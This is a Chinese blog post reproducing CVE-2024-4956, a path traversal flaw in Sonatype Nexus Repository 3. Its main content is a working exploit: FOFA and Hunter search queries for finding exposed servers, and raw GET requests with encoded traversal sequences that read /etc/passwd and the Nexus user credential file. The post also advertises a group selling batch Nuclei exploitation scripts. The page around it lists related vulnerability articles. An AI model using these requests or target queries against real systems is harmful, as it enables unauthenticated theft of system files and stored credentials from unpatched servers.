Sonatype Nexus Repository 3目录穿越-文件下载漏洞-CVE-2024-4956

最新推荐文章于 2024-06-02 10:20:23 发布
最新推荐文章于 2024-06-02 10:20:23 发布
阅读量693 收藏 5
点赞数 8
分类专栏: 漏洞复现集合 文章标签: 安全 web安全 网络安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/d2407169866/article/details/139169722
版权

 0x01 免责声明
文章内容仅供日常学习使用,请勿非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,由使用者承担全部法律及连带责任,作者及发布者不承担任何法律及连带责任。如有内容争议或侵权,我们会及时删除。

0x02 漏洞描述

Nexus是一个强大且使用广泛的Maven仓库管理器,它极大地简化了自己内部仓库的维护和外部仓库的访问,利用Nexus你可以只在一个地方就能够完全控制访问和部署在你所维护仓库中的每个Artifact。

Nexus Reposity3目录穿越-文件下载漏洞-CVE-2024-4956

影响版本:Nexus Repository 3 < 3.68.1

0x03 测绘查询-系统指纹

 fofa:app="Nexus-Repository-Manager"

鹰图:app.name=="Nexus Repository"

0x04 漏洞复现
1、访问漏洞系统


2、发送GET包,读取etc/password文件


3、读取密码文件

4、poc

GET /.%2f/..%2f/..%2f/..%2f/..%2f/etc/passwd HTTP/1.1Host:127.0.0.1

GET /.%2f/..%2f/..%2f/..%2f/..%2f/nexus-data/db/security/user.pcl HTTP/1.1Host:127.0.0.1

 0x05 Nuclei POC 批量验证脚本

加入帮会获取批量验证脚本,帮会每天更新漏洞nday、1day漏洞poc

点击链接加入帮会:加入帮会-发现更有料的网安圈基于安全从业者同行主题交流需求,为入驻者提供WIKI建设、安全经验输出、前沿技术及工具分享等模块,入驻即可共探安全思路。icon-default.png?t=N7T8https://wiki.freebuf.com/front/societyFront?invitation_code=2e2d0438&society_id=186&source_data=2

扫描也可加入:

渗透安全Sec
关注
  • 8
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Sonatype Nexus Repository 3 路径遍历漏洞复现(CVE-2024-4956)
0xSec
05-23 971
2024年5月,Nexus Repository官方Sonatype发布了新补丁,修复了一处路径穿越漏洞CVE-2024-4956。经分析,该漏洞可以通过特定的路径请求来未授权访问系统文件,进而可能导致信息泄露。该漏洞无前置条件且利用简单,建议受影响的客户尽快修复漏洞
Sonatype Nexus Repository Manager 3远程代码执行漏洞CVE-2019-7238)
不忘初心,护天下安全!
07-12 1688
研究人员在 Sonatype Nexus Repository Manager ( NXRM ) 3 中发现一个远程代码执行漏洞。Sonatype Nexus Repository Manager ( NXRM ) 3 是一个允许开发者管理软件开发、应用实现、自动硬件提供所必须的软件组件的开源项目。漏洞影响的 NXRM 3 目前安装量已经超过 15 万,该漏洞是腾讯安全云鼎实验室安全研究员 Rico 和长亭科技安全研究员 voidfyoo 发现的。研究人员通过分析发现利用该安全漏洞并不需要认证。因此攻击者很
nexus-3.37.0-01-win64 - Nexus Repository Manager OSS
12-12
Nexus Repository Manager OSS 由于nexus目前官网上(https://help.sonatype.com/repomanager3/download)已经很难下载了,除非翻墙,故整理了一下目前最新版本的分享一下,有需要的欢迎下载。
Nexus Repository Manager 3 远程命令执行漏洞CVE-2020-10199)
ch258563的博客
06-06 1539
Nexus Repository Manager 3 远程命令执行漏洞CVE-2020-10199)
【已复现】Sonatype Nexus Repository 3 路径遍历漏洞(CVE-2024-4956)安全风险通告
smellycat000的专栏
05-23 155
●点击↑蓝字关注我们,获取更多安全风险通告漏洞概述漏洞名称Sonatype Nexus Repository 3 路径遍历漏洞漏洞编号QVD-2024-18749,CVE-2024-4956公开时间2024-05-16影响量级十万级奇安信评级高危CVSS 3.1分数7.5威胁类型信息泄露利用可能性高POC状态已公开在野利用状态未发现EXP状态已公开技术细节状态已公开危害描述:未经身份认证的远程攻...
Nexus Repository Manager3( CVE-2020-10199) 远程命令执行漏洞排查
dayouzi的博客
08-14 1066
nexus的全称是Nexus Repository Manager,是Sonatype公司的一个产品。它是一个强大的仓库管理器,极大地简化了内部仓库的维护和外部仓库的访问。主要用它来搭建公司内部的maven私服。但是它的功能不仅仅是创建maven私有仓库这么简单,还可以作为nuget、docker、npm、bower、pypi、rubygems、git lfs、yum、go、apt等的私有仓库,功能非常强大。
用友U8 CRM swfupload 任意文件上传漏洞复现(XVE-2024-8597)
qq_39894062的博客
04-20 581
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。
nexus3-oss:安装和配置sonatype nexus3-oss的角色
01-31
角色扮演:Nexus 3 OSS 该角色将安装并配置Nexus Repository Manager OSS版本3.x。 可以通过重新运行角色来更新所有配置,但与相关的设置除外,它们在关系中是不变的。目录注意:从ansible星系站点查看时,TOC链接将...
官网下载的OSS版:nexus-2.15.1-02-bundle.zip
08-05
官网下载的OSS版:nexus-2.15.1-02-bundle.zip 用于搭建mavne私服 Nexus Repository OSS Nexus 是Maven仓库管理器,如果你使用Maven,你可以从Maven中央仓库 下载所需要的构件(artifact),但这通常不是一个好的做法...
nexus-oss-on-aws:具有良好架构的AWS上部署Sonatype Nexus Repository OSS
05-02
通过EKS上的Helm部署Sonatype Nexus Repository OSS。 通过EFS CSI驱动程序,PV和PVC使用EFS作为Nexus3数据存储 创建一个专用的S3存储桶作为Nexus3 Blobstore 使用外部DNS在Route53中为入口域名创建记录 使用ACM...
nexus-3.39.0-01 安装包下载(包含Linux 与Win版本)
06-21
Nexus 是 Sonatype 公司发布的一款仓库(Repository)管理软件,常用来搭建 Maven 私服,所以也有人将 Nexus 称为“Maven仓库管理器”。 压缩包内包含 Linux 版 与 win 版; Linux:nexus-3.39.0-01-unix.tar.gz ...
Nexus3.6 window版私服搭建 安装、配置教程
ArnoBM的博客
02-20 1285
1、本地环境配置(Nexus3.6支持jdk版本1.6、1.7、1.8) 1.1、官网下载地址:https://www.sonatype.com/download-oss-sonatype               百度网盘地址:https://pan.baidu.com/s/1hr4yG0c 1.2、解压得到目录 1.3、将Nexus的bin目录添加到Path环境变量中: 1.4...
CVE-2024-4956Nexus Repository 3 路径穿越漏洞复现 [附POC]
薛定谔嘚喵博客
05-30 161
Sonatype Nexus Repository是美国Sonatype公司的一款存储库管理器,它主要用于管理、存储和分发软件等。 Sonatype Nexus Repository 3.68.1之前版本存在安全漏洞,该漏洞源于存在路径遍历,允许未经身份验证的攻击者读取系统文件。
vulhub中Nexus Repository Manager 3 未授权目录穿越漏洞CVE-2024-4956
最新发布
yougexiaojiuguan的博客
06-02 356
漏洞复现过程的记录
Goby 漏洞发布|Sonatype Nexus Repository Manager 文件读取漏洞CVE-2024-4956
m0_46699477的博客
05-23 307
【代码】Goby 漏洞发布|Sonatype Nexus Repository Manager 文件读取漏洞CVE-2024-4956
注入补丁_【更新】Sonatype Nexus Repository Manager外部实体注入漏洞CVE202029436)
weixin_30119911的博客
01-13 757
漏洞名称 :Sonatype Nexus Repository Manager外部实体注入漏洞CVE-2020-29436威胁等级 : 高危影响范围:Nexus Repository Manager 3<=3.28.1漏洞类型 : XML外部实体注入利用难度 : 简单 漏洞分析 1Nexus Repository Manger介绍Nexus 一个是Mave...
CVE-2019-5475】Sonatype Nexus Repository Manager操作系统命令注入漏洞复现
Blog of Jaoing
04-21 1154
Sonatype Nexus Repository Manager(NXRM)是美国Sonatype公司的一款Maven仓库管理器。 Sonatype NXRM中存在操作系统命令注入漏洞。攻击者可利用该漏洞执行代码......
漏洞情报 | Sonatype Nexus Repository Manager 目录遍历漏洞
爱国小白帽
06-24 1252
​ 点击上方 订阅话题 第一时间了解漏洞威胁 0x01 漏洞描述 Sonatype Nexus Repository Manager 是美国Sonatype公司的一款仓库管理器。 360漏洞云监测到 Sonatype Nexus Repository Manager 3.x 系列 3.31.0 之前的版本存在目录遍历漏洞CVE-2021-34553)。经认证的远程攻击者可在未被授予访问权限的情况下获取blob文件清单,并通过构造一个GET请求读取blob文件内容,造成信息泄露。 0x02 危害等级 中
Sonatype Nexus Repository Manager 怎么执行docker pull
06-08
要在 Sonatype Nexus Repository Manager 中执行 Docker pull,您需要先创建一个 Docker 代理存储库来缓存 Docker 镜像。以下是执行 Docker pull 的步骤: 1. 登录 Sonatype Nexus Repository Manager 并导航到 "Repositories" 页面。 2. 点击 "Create Repository" 按钮并选择 "docker (proxy)" 选项。 3. 输入仓库的相关信息,包括名称、URL 和可选的认证信息。 4. 点击 "Create Repository" 按钮以创建 Docker 代理存储库。 5. 转到 Docker 主机上,并确保已安装 Docker 客户端。 6. 在命令行中输入 "docker login" 命令,并输入您的 Sonatype Nexus Repository Manager 凭据以登录。 7. 使用以下命令拉取 Docker 镜像: ``` docker pull <nexus-url>/<repository-name>/<image-name>:<tag> ``` 其中,"<nexus-url>" 是 Sonatype Nexus Repository Manager 的 URL,"<repository-name>" 是您创建的 Docker 代理存储库的名称,"<image-name>" 是要拉取的 Docker 镜像名称,"<tag>" 是要拉取的 Docker 镜像标签。 例如,以下命令将从名为 "docker-proxy" 的 Docker 代理存储库中拉取 "nginx" 镜像的 "latest" 标签: ``` docker pull http://<nexus-url>/repository/docker-proxy/nginx:latest ``` 请注意,如果您的 Sonatype Nexus Repository Manager 受到防火墙或代理的限制,则可能需要配置 Docker 客户端以使用代理。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值